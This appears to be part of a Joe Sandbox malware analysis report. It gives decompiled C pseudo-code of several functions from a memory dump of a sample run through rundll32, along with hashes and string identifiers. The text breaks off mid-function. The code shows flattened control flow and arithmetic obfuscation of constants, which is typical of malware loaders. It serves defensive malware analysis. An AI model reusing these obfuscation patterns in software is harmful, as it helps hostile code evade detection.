                                                                                                                      							_t316 = 0x6559491;
                                                                                                                      							goto L15;
                                                                                                                      						} else {
                                                                                                                      							_v44 = _t261;
                                                                                                                      							_t319 = 0x10000;
                                                                                                                      							goto L10;
                                                                                                                      						}
                                                                                                                      						goto L18;
                                                                                                                      						L15:
                                                                                                                      						_t261 = _v44;
                                                                                                                      					} while (_t316 != 0x6559491);
                                                                                                                      					L16:
                                                                                                                      					_t317 = _v24;
                                                                                                                      					if(_t317 == 0) {
                                                                                                                      						goto L20;
                                                                                                                      					} else {
                                                                                                                      						_t266 = _v12;
                                                                                                                      						 *_t266 = _t274;
                                                                                                                      						 *((intOrPtr*)(_t266 + 4)) = _t314 - _t319;
                                                                                                                      					}
                                                                                                                      					goto L18;
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x002d0bd6
                                                                                                                      0x002d0ba9
                                                                                                                      0x002d0cc9
                                                                                                                      0x002d0cd1
                                                                                                                      0x002d0cd1
                                                                                                                      0x002d0c76
                                                                                                                      0x002d0c83
                                                                                                                      0x002d0c84
                                                                                                                      0x002d0c87
                                                                                                                      0x002d0c8c
                                                                                                                      0x002d0c92
                                                                                                                      0x002d0c9c
                                                                                                                      0x002d0ca0
                                                                                                                      0x00000000
                                                                                                                      0x002d0c94
                                                                                                                      0x002d0c94
                                                                                                                      0x002d0c98
                                                                                                                      0x00000000
                                                                                                                      0x002d0c98
                                                                                                                      0x00000000
                                                                                                                      0x002d0ca5
                                                                                                                      0x002d0ca5
                                                                                                                      0x002d0ca9
                                                                                                                      0x002d0cb5
                                                                                                                      0x002d0cb5
                                                                                                                      0x002d0cbb
                                                                                                                      0x00000000
                                                                                                                      0x002d0cbd
                                                                                                                      0x002d0cbd
                                                                                                                      0x002d0cc3
                                                                                                                      0x002d0cc5
                                                                                                                      0x002d0cc5
                                                                                                                      0x00000000
                                                                                                                      0x002d0cbb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -1$0_e$@K$Q!$$^J
                                                                                                                      • API String ID: 0-785566946
                                                                                                                      • Opcode ID: 41ea18c928f5bc6e050d69f8087d6909cd5aff65254f797b7e67a5a6cbd5e357
                                                                                                                      • Instruction ID: b85e557570856b0fa5498649cf7cf5c37a93aad5c889131ac774c6228c23f24a
                                                                                                                      • Opcode Fuzzy Hash: 41ea18c928f5bc6e050d69f8087d6909cd5aff65254f797b7e67a5a6cbd5e357
                                                                                                                      • Instruction Fuzzy Hash: D9C12FB15183819FC358CF69C48990BFBE1FBC5798F508A1EF5A696220D3B0D919CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E002C0946(void* __ecx, void* __edx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _t226;
                                                                                                                      				signed int _t228;
                                                                                                                      				void* _t231;
                                                                                                                      				signed int _t233;
                                                                                                                      				signed int _t234;
                                                                                                                      				signed int _t235;
                                                                                                                      				signed int _t236;
                                                                                                                      				signed int _t237;
                                                                                                                      				void* _t263;
                                                                                                                      				void* _t264;
                                                                                                                      				signed int _t265;
                                                                                                                      				signed int* _t267;
                                                                                                                      				signed int* _t268;
                                                                                                                      
                                                                                                                      				_t267 =  &_v88;
                                                                                                                      				_v4 = _v4 & 0x00000000;
                                                                                                                      				_v8 = 0xb66c37;
                                                                                                                      				_v72 = 0xb73c2;
                                                                                                                      				_v72 = _v72 << 4;
                                                                                                                      				_v72 = _v72 | 0x07739320;
                                                                                                                      				_v72 = _v72 << 9;
                                                                                                                      				_v72 = _v72 ^ 0xef7952b0;
                                                                                                                      				_v28 = 0x2a4560;
                                                                                                                      				_v28 = _v28 + 0x8659;
                                                                                                                      				_v28 = _v28 ^ 0x002a9629;
                                                                                                                      				_v76 = 0x8c4def;
                                                                                                                      				_t263 = __edx;
                                                                                                                      				_t231 = __ecx;
                                                                                                                      				_t264 = 0xd46e588;
                                                                                                                      				_t233 = 0x74;
                                                                                                                      				_v76 = _v76 / _t233;
                                                                                                                      				_t234 = 0x6c;
                                                                                                                      				_v76 = _v76 * 3;
                                                                                                                      				_v76 = _v76 >> 5;
                                                                                                                      				_v76 = _v76 ^ 0x000c6890;
                                                                                                                      				_v80 = 0x921d05;
                                                                                                                      				_v80 = _v80 + 0xffff1131;
                                                                                                                      				_v80 = _v80 / _t234;
                                                                                                                      				_v80 = _v80 + 0xffff8087;
                                                                                                                      				_v80 = _v80 ^ 0x0007528b;
                                                                                                                      				_v20 = 0x474e9c;
                                                                                                                      				_t235 = 0xb;
                                                                                                                      				_v20 = _v20 * 0x25;
                                                                                                                      				_v20 = _v20 ^ 0x0a4b2981;
                                                                                                                      				_v44 = 0x41d7a6;
                                                                                                                      				_v44 = _v44 >> 4;
                                                                                                                      				_v44 = _v44 + 0xffffa7bd;
                                                                                                                      				_v44 = _v44 ^ 0x00093433;
                                                                                                                      				_v68 = 0x96e6ad;
                                                                                                                      				_v68 = _v68 * 0xe;
                                                                                                                      				_v68 = _v68 + 0x1201;
                                                                                                                      				_v68 = _v68 >> 9;
                                                                                                                      				_v68 = _v68 ^ 0x000fa369;
                                                                                                                      				_v24 = 0xe45c66;
                                                                                                                      				_t66 =  &_v24; // 0xe45c66
                                                                                                                      				_v24 =  *_t66 / _t235;
                                                                                                                      				_v24 = _v24 ^ 0x001eca74;
                                                                                                                      				_v12 = 0xe2325f;
                                                                                                                      				_v12 = _v12 >> 2;
                                                                                                                      				_v12 = _v12 ^ 0x003de0fa;
                                                                                                                      				_v40 = 0xdcdb46;
                                                                                                                      				_v40 = _v40 + 0xfb03;
                                                                                                                      				_v40 = _v40 + 0xffff4ab2;
                                                                                                                      				_v40 = _v40 ^ 0x00d010f5;
                                                                                                                      				_v16 = 0xf0578c;
                                                                                                                      				_t236 = 0x25;
                                                                                                                      				_v16 = _v16 * 0x2d;
                                                                                                                      				_v16 = _v16 ^ 0x2a381d62;
                                                                                                                      				_v60 = 0xf0efbe;
                                                                                                                      				_v60 = _v60 / _t236;
                                                                                                                      				_t265 = 0x18;
                                                                                                                      				_v60 = _v60 / _t265;
                                                                                                                      				_v60 = _v60 + 0xffffc994;
                                                                                                                      				_v60 = _v60 ^ 0x00051ba1;
                                                                                                                      				_v64 = 0xfb78a0;
                                                                                                                      				_v64 = _v64 << 9;
                                                                                                                      				_t237 = 0x41;
                                                                                                                      				_v64 = _v64 / _t237;
                                                                                                                      				_v64 = _v64 | 0xcaafab65;
                                                                                                                      				_v64 = _v64 ^ 0xcbeb608b;
                                                                                                                      				_v84 = 0xb70797;
                                                                                                                      				_v84 = _v84 ^ 0x7f243ece;
                                                                                                                      				_v84 = _v84 | 0x19416b2b;
                                                                                                                      				_v84 = _v84 ^ 0xcf7db733;
                                                                                                                      				_v84 = _v84 ^ 0xb0a40cc8;
                                                                                                                      				_v88 = 0xcdb2b9;
                                                                                                                      				_v88 = _v88 + 0x7ca0;
                                                                                                                      				_v88 = _v88 + 0xffff4266;
                                                                                                                      				_v88 = _v88 / _t265;
                                                                                                                      				_v88 = _v88 ^ 0x000ad15f;
                                                                                                                      				_v32 = 0x3f4742;
                                                                                                                      				_v32 = _v32 + 0xffff8438;
                                                                                                                      				_v32 = _v32 ^ 0x00328def;
                                                                                                                      				_v48 = 0xe7fa35;
                                                                                                                      				_v48 = _v48 | 0x5473134a;
                                                                                                                      				_v48 = _v48 + 0x6bf3;
                                                                                                                      				_v48 = _v48 ^ 0x54f160bb;
                                                                                                                      				_v36 = 0x82f06;
                                                                                                                      				_v36 = _v36 >> 1;
                                                                                                                      				_v36 = _v36 * 0x4f;
                                                                                                                      				_v36 = _v36 ^ 0x0140909c;
                                                                                                                      				_v52 = 0x77cd37;
                                                                                                                      				_v52 = _v52 << 0xb;
                                                                                                                      				_v52 = _v52 ^ 0x0f05aaad;
                                                                                                                      				_v52 = _v52 * 0x5b;
                                                                                                                      				_v52 = _v52 ^ 0x116d7cbe;
                                                                                                                      				_v56 = 0x6cb0a3;
                                                                                                                      				_v56 = _v56 + 0xab46;
                                                                                                                      				_v56 = _v56 >> 0x10;
                                                                                                                      				_v56 = _v56 + 0x7715;
                                                                                                                      				_v56 = _v56 ^ 0x0001d55a;
                                                                                                                      				do {
                                                                                                                      					while(_t264 != 0x8d90b87) {
                                                                                                                      						if(_t264 == 0x991fac7) {
                                                                                                                      							return E002BF88A(_v36, _v52, _v56,  *(_t263 + 0x30));
                                                                                                                      						}
                                                                                                                      						if(_t264 == 0xa3f1429) {
                                                                                                                      							_push(_t237);
                                                                                                                      							_t228 = E002C8D71(_v72, _v28, __eflags, _v76, _v80, _t231);
                                                                                                                      							_t268 =  &(_t267[4]);
                                                                                                                      							 *(_t263 + 0x30) = _t228;
                                                                                                                      							__eflags = _t228;
                                                                                                                      							if(_t228 != 0) {
                                                                                                                      								E002BEE05(_v44, _v68, _v24, _t228, _t228);
                                                                                                                      								_t237 =  *(_t263 + 0x30);
                                                                                                                      								E002CE713(_t237, _v12, _v40, _v16);
                                                                                                                      								_t267 =  &(_t268[6]);
                                                                                                                      								_t264 = 0x8d90b87;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t264 == 0xd46e588) {
                                                                                                                      								_t264 = 0xa3f1429;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t264 != 0xf9322b8) {
                                                                                                                      									goto L14;
                                                                                                                      								} else {
                                                                                                                      									_t237 = E002B6ED6;
                                                                                                                      									_t228 = E002C4EFF(E002B6ED6, _v84, E002B6ED6, E002B6ED6, _v88, _v32, E002B6ED6, _v48, _t263);
                                                                                                                      									_t267 =  &(_t267[8]);
                                                                                                                      									 *(_t263 + 0x24) = _t228;
                                                                                                                      									if(_t228 == 0) {
                                                                                                                      										_t264 = 0x991fac7;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						return _t228;
                                                                                                                      						L18:
                                                                                                                      					}
                                                                                                                      					_t237 = _v60;
                                                                                                                      					_t226 = E002C2BDE(_t237,  *(_t263 + 0x30), _v64);
                                                                                                                      					_t267 =  &(_t267[1]);
                                                                                                                      					 *(_t263 + 0xc) = _t226;
                                                                                                                      					__eflags = _t226;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t264 = 0x991fac7;
                                                                                                                      						goto L14;
                                                                                                                      					} else {
                                                                                                                      						_t264 = 0xf9322b8;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L18;
                                                                                                                      					L14:
                                                                                                                      					__eflags = _t264 - 0x74fce14;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t228;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 34$BG?$_2$`E*$f\
                                                                                                                      • API String ID: 0-782548322
                                                                                                                      • Opcode ID: 1f1584736396cdcc228a14b3782ab50ca53e36bc3c4304feabb3e588698e1cc3
                                                                                                                      • Instruction ID: b1e83bfdb13cf88c73851aaacc8bb3a99151a6b113731fae451f5533fb788b7c
                                                                                                                      • Opcode Fuzzy Hash: 1f1584736396cdcc228a14b3782ab50ca53e36bc3c4304feabb3e588698e1cc3
                                                                                                                      • Instruction Fuzzy Hash: D8A13FB2918341DFC358CF24C88990BFBE1BBC4758F409A1EF59A96260D7B5DA58CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E002C561F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                      				signed int _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				char _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				unsigned int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				void* _t181;
                                                                                                                      				signed int _t191;
                                                                                                                      				void* _t203;
                                                                                                                      				signed int _t204;
                                                                                                                      				signed int _t205;
                                                                                                                      				void* _t208;
                                                                                                                      				signed int _t218;
                                                                                                                      				intOrPtr* _t219;
                                                                                                                      				void* _t220;
                                                                                                                      				signed int* _t223;
                                                                                                                      
                                                                                                                      				_t219 = _a8;
                                                                                                                      				_push(_t219);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t181);
                                                                                                                      				_v4 = _v4 & 0x00000000;
                                                                                                                      				_t223 =  &(( &_v92)[4]);
                                                                                                                      				_v12 = 0x6615d4;
                                                                                                                      				_v8 = 0x63ffda;
                                                                                                                      				_t220 = 0;
                                                                                                                      				_v28 = 0xf9afd3;
                                                                                                                      				_t208 = 0x31efc18;
                                                                                                                      				_v28 = _v28 >> 7;
                                                                                                                      				_v28 = _v28 ^ 0x0001f35e;
                                                                                                                      				_v80 = 0xd84a57;
                                                                                                                      				_v80 = _v80 << 3;
                                                                                                                      				_t204 = 0x18;
                                                                                                                      				_v80 = _v80 * 0x2a;
                                                                                                                      				_v80 = _v80 + 0x45cf;
                                                                                                                      				_v80 = _v80 ^ 0x1be1d7fe;
                                                                                                                      				_v84 = 0xce5c8a;
                                                                                                                      				_v84 = _v84 + 0xa551;
                                                                                                                      				_v84 = _v84 * 0x57;
                                                                                                                      				_v84 = _v84 | 0xfd3f873a;
                                                                                                                      				_v84 = _v84 ^ 0xff78090e;
                                                                                                                      				_v52 = 0xb08f91;
                                                                                                                      				_v52 = _v52 >> 0xc;
                                                                                                                      				_v52 = _v52 + 0xb2fa;
                                                                                                                      				_v52 = _v52 ^ 0x000b6173;
                                                                                                                      				_v56 = 0x674ce5;
                                                                                                                      				_v56 = _v56 + 0x398f;
                                                                                                                      				_v56 = _v56 >> 0x10;
                                                                                                                      				_v56 = _v56 ^ 0x0001bfbd;
                                                                                                                      				_v88 = 0x67105a;
                                                                                                                      				_v88 = _v88 * 0x51;
                                                                                                                      				_v88 = _v88 ^ 0xbb721b0a;
                                                                                                                      				_v88 = _v88 ^ 0x493680b5;
                                                                                                                      				_v88 = _v88 ^ 0xd2dd6d54;
                                                                                                                      				_v60 = 0x6eef31;
                                                                                                                      				_v60 = _v60 << 6;
                                                                                                                      				_v60 = _v60 | 0x99e12062;
                                                                                                                      				_v60 = _v60 ^ 0x9bf73816;
                                                                                                                      				_v92 = 0x911a2f;
                                                                                                                      				_v92 = _v92 ^ 0xd10c2d91;
                                                                                                                      				_v92 = _v92 * 0x5e;
                                                                                                                      				_v92 = _v92 << 7;
                                                                                                                      				_v92 = _v92 ^ 0xdd366504;
                                                                                                                      				_v64 = 0x3fcb13;
                                                                                                                      				_v64 = _v64 >> 0xf;
                                                                                                                      				_v64 = _v64 * 6;
                                                                                                                      				_v64 = _v64 ^ 0x00005971;
                                                                                                                      				_v44 = 0xc7907a;
                                                                                                                      				_v44 = _v44 << 0xb;
                                                                                                                      				_v44 = _v44 >> 0xb;
                                                                                                                      				_v44 = _v44 ^ 0x000cecb3;
                                                                                                                      				_v24 = 0x5cb13a;
                                                                                                                      				_v24 = _v24 | 0x9101a275;
                                                                                                                      				_v24 = _v24 ^ 0x91595ccd;
                                                                                                                      				_v48 = 0x23abf4;
                                                                                                                      				_v48 = _v48 / _t204;
                                                                                                                      				_v48 = _v48 << 2;
                                                                                                                      				_v48 = _v48 ^ 0x0009bb3e;
                                                                                                                      				_v68 = 0x8d9eb5;
                                                                                                                      				_v68 = _v68 >> 0x10;
                                                                                                                      				_v68 = _v68 + 0xf044;
                                                                                                                      				_v68 = _v68 >> 0xe;
                                                                                                                      				_v68 = _v68 ^ 0x000dd2f9;
                                                                                                                      				_v20 = 0x3507ed;
                                                                                                                      				_v20 = _v20 + 0xe3ac;
                                                                                                                      				_v20 = _v20 ^ 0x00302855;
                                                                                                                      				_v32 = 0xacaccb;
                                                                                                                      				_v32 = _v32 ^ 0xc0e60235;
                                                                                                                      				_t205 = 0x4e;
                                                                                                                      				_v32 = _v32 * 0x53;
                                                                                                                      				_v32 = _v32 ^ 0x583b0f23;
                                                                                                                      				_v36 = 0x7d6507;
                                                                                                                      				_v36 = _v36 + 0xffff02b5;
                                                                                                                      				_t191 = _v36;
                                                                                                                      				_t218 = _t191 % _t205;
                                                                                                                      				_v36 = _t191 / _t205;
                                                                                                                      				_v36 = _v36 ^ 0x0005008b;
                                                                                                                      				_v40 = 0xd19b6c;
                                                                                                                      				_v40 = _v40 | 0xa0bb2537;
                                                                                                                      				_v40 = _v40 + 0xffff1d7c;
                                                                                                                      				_v40 = _v40 ^ 0xa0fa32c2;
                                                                                                                      				_v72 = 0xc60854;
                                                                                                                      				_v72 = _v72 | 0x85b2e473;
                                                                                                                      				_v72 = _v72 + 0x7f84;
                                                                                                                      				_v72 = _v72 * 0x36;
                                                                                                                      				_v72 = _v72 ^ 0x423e0813;
                                                                                                                      				_v76 = 0xd43520;
                                                                                                                      				_v76 = _v76 + 0x4339;
                                                                                                                      				_v76 = _v76 + 0xffffe1a4;
                                                                                                                      				_v76 = _v76 >> 0xd;
                                                                                                                      				_v76 = _v76 ^ 0x000c8c56;
                                                                                                                      				do {
                                                                                                                      					while(_t208 != 0x2557e54) {
                                                                                                                      						if(_t208 == 0x31efc18) {
                                                                                                                      							_t208 = 0xe841cef;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t208 == 0xa700901) {
                                                                                                                      								E002BB267(_a4, _t218, _v68,  &_v16, _v20, _t208, _v32, _t220, _v36, _v40, _t208, _v72, _v76, _v80);
                                                                                                                      								 *_t219 = _v16;
                                                                                                                      							} else {
                                                                                                                      								if(_t208 != 0xe841cef) {
                                                                                                                      									goto L11;
                                                                                                                      								} else {
                                                                                                                      									_t203 = E002BB267(_a4, _t218, _v84,  &_v16, _v52, _t208, _v56, 0, _v88, _v60, _t208, _v92, _v64, _v28);
                                                                                                                      									_t223 =  &(_t223[0xc]);
                                                                                                                      									if(_t203 != 0) {
                                                                                                                      										_t208 = 0x2557e54;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L14:
                                                                                                                      						return _t220;
                                                                                                                      					}
                                                                                                                      					_push(_t208);
                                                                                                                      					_push(_t208);
                                                                                                                      					_t220 = E002C3512(_v16);
                                                                                                                      					if(_t220 == 0) {
                                                                                                                      						_t208 = 0x2fabbe9;
                                                                                                                      						goto L11;
                                                                                                                      					} else {
                                                                                                                      						_t208 = 0xa700901;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L14;
                                                                                                                      					L11:
                                                                                                                      				} while (_t208 != 0x2fabbe9);
                                                                                                                      				goto L14;
                                                                                                                      			}




































                                                                                                                      0x002c58e7
                                                                                                                      0x00000000
                                                                                                                      0x002c58e9
                                                                                                                      0x002c5919
                                                                                                                      0x002c591e
                                                                                                                      0x002c5923
                                                                                                                      0x002c5929
                                                                                                                      0x00000000
                                                                                                                      0x002c5929
                                                                                                                      0x002c5923
                                                                                                                      0x002c58e7
                                                                                                                      0x002c58db
                                                                                                                      0x002c59ae
                                                                                                                      0x002c59b6
                                                                                                                      0x002c59b6
                                                                                                                      0x002c5940
                                                                                                                      0x002c5941
                                                                                                                      0x002c594b
                                                                                                                      0x002c5951
                                                                                                                      0x002c595a
                                                                                                                      0x00000000
                                                                                                                      0x002c5953
                                                                                                                      0x002c5953
                                                                                                                      0x00000000
                                                                                                                      0x002c5953
                                                                                                                      0x00000000
                                                                                                                      0x002c595f
                                                                                                                      0x002c595f
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 1n$9C$U(0$qY$Lg
                                                                                                                      • API String ID: 0-890920262
                                                                                                                      • Opcode ID: 3dd90d24197c6e0eb425be8a52b4512aac5aa0624a9b5daf25ccf20776c8ba82
                                                                                                                      • Instruction ID: fa7e99792e6a47446d1b4c6c96444f7caf86e90ed00c9712d4b2702d9608585f
                                                                                                                      • Opcode Fuzzy Hash: 3dd90d24197c6e0eb425be8a52b4512aac5aa0624a9b5daf25ccf20776c8ba82
                                                                                                                      • Instruction Fuzzy Hash: 06911EB14197819FC358CF65C58A91BFBF1FB94758F004A0DF2A686260D3B5DA98CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E002BC309() {
                                                                                                                      				char _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				intOrPtr _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _v540;
                                                                                                                      				signed int _v544;
                                                                                                                      				signed int _v548;
                                                                                                                      				signed int _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _v568;
                                                                                                                      				signed int _v572;
                                                                                                                      				signed int _v576;
                                                                                                                      				signed int _v580;
                                                                                                                      				signed int _v584;
                                                                                                                      				signed int _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				signed int _v600;
                                                                                                                      				signed int _v604;
                                                                                                                      				signed int _t177;
                                                                                                                      				void* _t180;
                                                                                                                      				void* _t183;
                                                                                                                      				intOrPtr _t190;
                                                                                                                      				intOrPtr _t192;
                                                                                                                      				signed int _t208;
                                                                                                                      				signed int _t209;
                                                                                                                      				signed int _t210;
                                                                                                                      				signed int* _t213;
                                                                                                                      
                                                                                                                      				_t213 =  &_v604;
                                                                                                                      				_v528 = _v528 & 0x00000000;
                                                                                                                      				_v532 = 0xe4831e;
                                                                                                                      				_t183 = 0x6eb28ed;
                                                                                                                      				_v552 = 0x1276c3;
                                                                                                                      				_v552 = _v552 ^ 0x42b4d72c;
                                                                                                                      				_v552 = _v552 + 0xf95f;
                                                                                                                      				_v552 = _v552 ^ 0x42a4cd0b;
                                                                                                                      				_v548 = 0x347a6a;
                                                                                                                      				_v548 = _v548 | 0x3256b11b;
                                                                                                                      				_v548 = _v548 ^ 0x3277037e;
                                                                                                                      				_v564 = 0x82dd46;
                                                                                                                      				_v564 = _v564 + 0xffffb28a;
                                                                                                                      				_v564 = _v564 << 0xf;
                                                                                                                      				_v564 = _v564 ^ 0x47e00e04;
                                                                                                                      				_v600 = 0xaa25ff;
                                                                                                                      				_v600 = _v600 << 0xd;
                                                                                                                      				_v600 = _v600 + 0xf5f3;
                                                                                                                      				_v600 = _v600 + 0xffff8f6c;
                                                                                                                      				_v600 = _v600 ^ 0x44cc5d5c;
                                                                                                                      				_v556 = 0x1132ac;
                                                                                                                      				_v556 = _v556 | 0x9b4d5b2d;
                                                                                                                      				_v556 = _v556 ^ 0x2eadc533;
                                                                                                                      				_v556 = _v556 ^ 0xb5fd7d8d;
                                                                                                                      				_v536 = 0x11628e;
                                                                                                                      				_v536 = _v536 * 0x4b;
                                                                                                                      				_v536 = _v536 ^ 0x051afcb6;
                                                                                                                      				_v584 = 0xa15265;
                                                                                                                      				_v584 = _v584 << 9;
                                                                                                                      				_t208 = 0x76;
                                                                                                                      				_v584 = _v584 / _t208;
                                                                                                                      				_t209 = 0x44;
                                                                                                                      				_v584 = _v584 * 0x30;
                                                                                                                      				_v584 = _v584 ^ 0x1b1be586;
                                                                                                                      				_v576 = 0xad5a3e;
                                                                                                                      				_v576 = _v576 | 0x6c06410f;
                                                                                                                      				_v576 = _v576 * 0xe;
                                                                                                                      				_v576 = _v576 ^ 0xf19bc2b8;
                                                                                                                      				_v540 = 0x7faa4f;
                                                                                                                      				_v540 = _v540 + 0xffff807e;
                                                                                                                      				_v540 = _v540 ^ 0x007d47f3;
                                                                                                                      				_v544 = 0x15cbe5;
                                                                                                                      				_v544 = _v544 | 0x222269e9;
                                                                                                                      				_v544 = _v544 ^ 0x2236b88c;
                                                                                                                      				_v592 = 0x7f48ca;
                                                                                                                      				_v592 = _v592 << 3;
                                                                                                                      				_v592 = _v592 / _t209;
                                                                                                                      				_v592 = _v592 | 0x6974e558;
                                                                                                                      				_v592 = _v592 ^ 0x697a9c68;
                                                                                                                      				_v568 = 0xdf464;
                                                                                                                      				_v568 = _v568 << 0xf;
                                                                                                                      				_v568 = _v568 | 0x68444ee0;
                                                                                                                      				_v568 = _v568 ^ 0xfa71a6c1;
                                                                                                                      				_v588 = 0x4eabc7;
                                                                                                                      				_v588 = _v588 >> 4;
                                                                                                                      				_v588 = _v588 ^ 0xdf4d904b;
                                                                                                                      				_v588 = _v588 + 0x3b02;
                                                                                                                      				_v588 = _v588 ^ 0xdf416162;
                                                                                                                      				_v596 = 0x2da8e3;
                                                                                                                      				_v596 = _v596 | 0xcaed8666;
                                                                                                                      				_v596 = _v596 + 0xffff0300;
                                                                                                                      				_v596 = _v596 ^ 0x5b73fee0;
                                                                                                                      				_v596 = _v596 ^ 0x9196765f;
                                                                                                                      				_v604 = 0x945bcd;
                                                                                                                      				_v604 = _v604 + 0xffffdd7c;
                                                                                                                      				_v604 = _v604 | 0x6dfc281c;
                                                                                                                      				_v604 = _v604 << 3;
                                                                                                                      				_v604 = _v604 ^ 0x6fe21eca;
                                                                                                                      				_v580 = 0xe4e766;
                                                                                                                      				_t122 =  &_v580; // 0xe4e766
                                                                                                                      				_t210 = 0x1c;
                                                                                                                      				_t177 =  *_t122 / _t210;
                                                                                                                      				_v580 = _t177;
                                                                                                                      				_v580 = _v580 + 0x73a9;
                                                                                                                      				_v580 = _v580 | 0xb028f1fa;
                                                                                                                      				_v580 = _v580 ^ 0xb0236f0a;
                                                                                                                      				_v572 = 0x26d4cb;
                                                                                                                      				_v572 = _v572 ^ 0xbda42e04;
                                                                                                                      				_v572 = _v572 << 8;
                                                                                                                      				_v572 = _v572 ^ 0x82f622a5;
                                                                                                                      				_v560 = 0x78c236;
                                                                                                                      				_v560 = _v560 | 0xc7202908;
                                                                                                                      				_v560 = _v560 >> 9;
                                                                                                                      				_v560 = _v560 ^ 0x0065a40e;
                                                                                                                      				do {
                                                                                                                      					while(_t183 != 0x6eb28ed) {
                                                                                                                      						if(_t183 == 0x7fdcf56) {
                                                                                                                      							return E002B1950(_v580, _v572, __eflags, 0,  &_v524,  &_v524, E002CD3C8, _v560);
                                                                                                                      						}
                                                                                                                      						if(_t183 == 0xb7324ef) {
                                                                                                                      							_t177 = E002C4FA8(_v588,  &_v524, _v596, _v604);
                                                                                                                      							 *_t177 = 0;
                                                                                                                      							_t183 = 0x7fdcf56;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						_t220 = _t183 - 0xb9bc25f;
                                                                                                                      						if(_t183 != 0xb9bc25f) {
                                                                                                                      							goto L8;
                                                                                                                      						}
                                                                                                                      						_push(_v600);
                                                                                                                      						_push(_v564);
